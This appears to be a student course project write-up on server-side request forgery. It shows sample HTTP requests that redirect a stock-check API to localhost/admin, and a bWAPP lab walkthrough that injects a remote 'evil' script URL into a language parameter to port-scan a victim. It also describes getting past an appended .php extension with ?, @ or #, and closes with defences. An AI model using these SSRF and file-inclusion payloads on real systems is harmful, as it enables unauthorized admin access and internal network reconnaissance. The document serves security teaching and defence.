## University of Dayton ##

## Department of Computer Science ##

## CPS 474/574 Software/Language-based Security ##

## Instructor:Dr. Phu Phung ##

# Server-side request forgery (SSRF) #

## Team 12 - Members: ##
1. Nhan Tran <tranh6@udayton.edu>
2. Bandar Alharbi <alharbib13@udayton.edu>

## Project Summary ##
First of all, we need server application which is vulnerable for SSRF. Initially, I will use already
pre-made server application, which is very vulnerable. I will perform several SSRF attacks against
this application, to show how SSRF works. In second step, me and Bandar will create our own application
(also vulnerable) and perform similar attacks as on pre-made application. And, finally, third step, 
I will update security on my application and show how to defend against SSRF attacks.

## Introduction ##
SSRF is web security vulnerability which allows an attacker to induce server side
application and make HTTP requests. Goal of attacker is to leak sensitive data such
as authorization credentials. A successful SSRF attack results in unauthorized action
or access to data within the organization. Data can be accessed either on application
itself or on other back-end systems connected to the application. Connections to
external third-party systems may result in malicious onward attacks that appear to
come from hosting organization. SSRF attacks often exploit trust relationships and 
perform unauthorized actions. One of them is SSRF attacks against the server itself. 
Below is sample of such attack. For example, let’s assume we have online application 
with various products, where application allows user to check is that product available
in some store. Function is implemented by passing URL to backend API via next HTTP request

```

   POST /product/stock HTTP/1.0
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 118

   stockApi=http://stock.sampleshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1


```

In this case, attacker can modify request against server itself, like this:

```

   POST /product/stock HTTP/1.0
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 118

   stockApi=http://localhost/admin

```

Content of admin page will be fetched by the server and shown to the attacker.
Attacker who simply visit admin URL directly won’t see anything interesting,
because he needs authentication. But, if request comes from local machine itself,
authentication is bypassed and attacker have full access to admin panel. 
This is just one of many types SSRF attacks. I am planning to give a brief
introduce about some of them, and make some a simple application to simulate
the attack; After that, me and my teammate will show how application should
looks like to avoid such vulnerability. 
  
  
  
## Background ##
### What is server-side request forgery (SSRF) and how can you prevent it?
SSRF is an attack that allows attackers to send malicious requests to other
systems via a vulnerable web server. Listed in the OWASP Top 10 as a major
application security risk, SSRF vulnerabilities can lead to information
exposure and open the way for far more dangerous attacks. This post shows
how SSRF works and how you can identify and prevent SSRF vulnerabilities
in your web applications.
![SSRF](Pictures/574_p1.png)
### Introduction to server-side request forgery (SSRF)
Requests between HTTP servers can be triggered by web applications.
These are commonly used to fetch remote resources like software updates
or to import metadata from a URL or another online application. Inter-server
requests like these aren't harmful in and of itself, but if done incorrectly,
they can expose a server to server-side request forgery, or SSRF. When
user-controllable data is utilized to construct the target URL, an SSRF
vulnerability is introduced. An attacker can then change a parameter value
in the vulnerable web application to make or control requests from the
vulnerable server to perform an SSRF attack.  
Server-side request forgery is a well-known flaw that frequently appears on
the Open Web Application Security Project's top ten list of web application
security threats. It has even been given its own category in the OWASP Top 10
for 2021 (A10:2021 – Server-Side Request Forgery) for the first time (SSRF).
Based on the findings of a community survey, it was designated as a separate
category. Fetching a URI has become a vital process for delivering content and
functionality as modern web applications become more complicated and integrated
. SSRF vulnerabilities have become increasingly widespread as the number of
server-side requests has increased. At the same time, their reach and impact
are growing as cloud services and complex cloud-based application architectures
become more common, allowing attackers to get access to web infrastructures and
cloud data sources through a hacked server.
### Why is server-side request forgery dangerous?
SSRF allows attackers to use the target as an intermediary to transmit requests
to a third system, whereas many web vulnerabilities directly affect the target
system. While an SSRF assault may not be harmful in and of itself, it can provide
hostile hackers access to internal systems that should never be accessible from
the Internet. This is dangerous for a number of reasons.
### SSRF abuses the trust relationship between internal systems
Always keep your attack surface as small as feasible on all levels as a security
best practice. This usually means that access to specified ports or operations is
limited to whitelisted devices only in internal networks. Servers frequently
establish a trust relationship with select other machines to protect security
while still being able to share data and execute administrative duties. This
trust can mean that a firewall only allows access to certain ports if the asking
machine is on the same local network or if its IP address is expressly trusted.
At the software level, you can have implicit trust in local machines so that
authentication isn't necessary for various administrative operations as long
as the IP address is 127.0.0.1 or inside the internal network. This provides
a layer of physical security since even if an attacker has proper credentials,
they won't be able to access the system.
### SSRF allows attackers to scan local or external networks
Attackers may be able to scan local or external networks linked to the affected
server by exploiting a server-side request forgery vulnerability. While it is
usually impossible to extract data directly, attackers can use the page load time,
error messages, or banners of the service they are probing to infer whether the
targeted service is responding or a tested port is open by looking at the page load
time, error messages, or banners of the service they are probing.
### Preventing server-side request forgery
You should implement a whitelist of acceptable domains and protocols for external
resources downloaded by the web server to prevent SSRF vulnerabilities in your online
applications. In general, you should avoid directly using user input in any functions
that potentially initiate requests on the server's behalf. While sanitizing and filtering
user input is always a good idea, you should not rely on it as your only defense because
it is nearly difficult to cover all possible cases.



## Project Description ##
First of all, we need server application which is vulnerable for SSRF. 
Initially, I will use already pre-made server application, which is very vulnerable. I will perform several SSRF attacks against this application, to show how SSRF works. 
In second step, me and Bandar will create our own application (also vulnerable) and perform similar attacks as on pre-made application. 
And, finally, third step, I will update security on my application and show how to defend against SSRF attacks. 

### STEP 1.
For pre-made vulnerably server application, I have selected bWapp.
After downloading application, I have installed it locally, and created MySQL database. 
Application is done using PHP, so we will need MySQL, PHP, and Apache server in order 
to test this application.  
![Login](Pictures/1-Login.PNG)  
Login using “bee” and “bug” for Login and Password.Choose SSRF from drop down menu.  
![SSRF_Choosing](Pictures/2-SSRF-choosing.PNG)  
Application shows 3 ways to exploit SSRF attack (source BWapp):
- Port scan hosts on the internal network using RFI.
- Access resources on the internal network using XXE.
- Crash Samsung SmartTV (CVE-2013-4890) using XXE  

We will perform the first one (Port Scan). Let's start with the low security level first. 
From the menu in upper right corner, I have selected Remote & Local File Intrusion (RFI/LFI)  
![RFI_Choosing](Pictures/3-rfi-choosing(security-low).PNG)  
After selecting that option, next page is shown. 
We should pay attention to this part. This part is typical (common) for selecting some value from drop-down lists and it is often used in web applications. 
After “Go” button is pressed, new URL appears in web browser  
![check language parameter](Pictures/4-CheckLangParameter.PNG)  
This is also important step and we need to pay attention to URL:

http://localhost/bWAPP/rlfi.php?language=lang_en.php&action=go 

We can test and check the URL vulnerability by changing:
language=lang_en.php parameter to “https://www.google.com”.  
![check language parameter](Pictures/5-CheckLangParameter(cont).PNG)  


Now we know that the URL has vulnerability. We will create a malicious script to display the ports on the victim's machine.  
![Malicous Script](Pictures/6-CreateMalicousScript.PNG)  


After that, we will call the file by replacing the URL as the following: 

http://localhost/bWAPP/rlfi.php?ip='victimip'&language= http://localhost/evil/ssrf-1.txt&action=go

I will copy this into web browser. After execution list of all ports is shown, like on  
![The ports](Pictures/8-PortsShow.PNG)  
  


Here in bWapp all ports are listed, but in real world application we probably should use port by port scanning in order to find one which is working. 
With this SSRF exploitation, we can do one of following:
-	Bypass IP whitelisting 
-	Extract information
-	Scan internal network etc.

Some of recommended actions to resolve these issues are:
-	Disable unused URL schemas 
-	Sanitize the input and whitelist acceptable file names

Next, we will perform the attack at medium security level. We will increase the security level to 1. 
![Security level](Pictures/9-MediumSecurity.PNG)  
The attack does not work since the code now has been forced the extension .php to be appended to the language parameter. 
![Recheck](Pictures/10-Recheckfile.PNG)  
This can also be bypass by adding characters like ?, @ or # at the end of the URL to force PHP to reinterpret the URL and discard the extension.
![Bypass](Pictures/11-Bypass.PNG)  


## Results ##
One of the best practice to protect against the SSRF attack using RLFI is whitelisting permitted files which is also the highest security level in the BWapp website.  
![Whitelising](Pictures/12-Whitelising.PNG)  
The goals of our project is to increase the security of the web app in order to mitigate the risk of getting SSRF attack from hackers; and we have successfully learnt the solution to improve the application. Still, it is not 100% guarantee preventing the SSRF attack since there are many new ways that the attacker can exploit the program. However, I believe we have also successfully raised awareness about the SSRF attack by demonstrate how easy it could be done.  


# Project Prototype #
[README.md file](https://bitbucket.org/ss-lbs-f21-team12/ss-lbs-f21-team12_ssrf/src/master/README.md)
[Latest commit](https://bitbucket.org/ss-lbs-f21-team12/ss-lbs-f21-team12_ssrf/commits/a45130eb0e5bbd00ec3cb64ec696c4512962768a)


# Appendix #
![Figure1](Pictures/1-Login.PNG)
![Figure2](Pictures/2-SSRF-choosing.PNG)
![Figure3](Pictures/3-rfi-choosing(security-low).PNG)
![Figure4](Pictures/4-CheckLangParameter.PNG)
![Figure5](Pictures/5-CheckLangParameter(cont).PNG)  
![Figure6](Pictures/6-CreateMalicousScript.PNG) 
![Figure8](Pictures/8-PortsShow.PNG) 
![Figure9](Pictures/9-MediumSecurity.PNG)
![Figure10](Pictures/10-Recheckfile.PNG)
![Figure11](Pictures/10-Recheckfile.PNG)
![Figure12](Pictures/12-Whitelising.PNG)
